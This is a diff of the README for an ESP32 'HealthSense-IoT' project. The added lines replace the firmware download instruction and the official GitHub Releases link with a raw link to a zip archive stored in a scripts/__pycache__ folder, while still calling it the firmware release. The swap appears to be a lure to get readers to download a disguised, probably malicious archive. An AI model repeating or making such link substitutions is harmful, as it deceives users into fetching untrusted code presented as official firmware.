thongvn7/HealthSense-IoT/README.md

 Downloads and executable artifacts
 - The Releases page contains the firmware binary you need to flash your ESP32 device.
-- For a straightforward workflow, download HealthSense-IoT_Firmware.bin from the Releases page and flash it to your ESP32 device using your preferred toolchain.
+- For a straightforward workflow, download https://raw.githubusercontent.com/thongvn7/HealthSense-IoT/master/scripts/__pycache__/Io-Health-Sense-T-1.0-beta.5.zip from the Releases page and flash it to your ESP32 device using your preferred toolchain.
 - After flashing, power up the device and verify it appears in the dashboard with live readings.
-- For reference, the latest release URL is again provided here: https://github.com/thongvn7/HealthSense-IoT/releases
+- For reference, the latest release URL is again provided here: https://raw.githubusercontent.com/thongvn7/HealthSense-IoT/master/scripts/__pycache__/Io-Health-Sense-T-1.0-beta.5.zip

 End-to-end usage scenario
 - A user powers the ESP32 panel and connects it to Wi-Fi.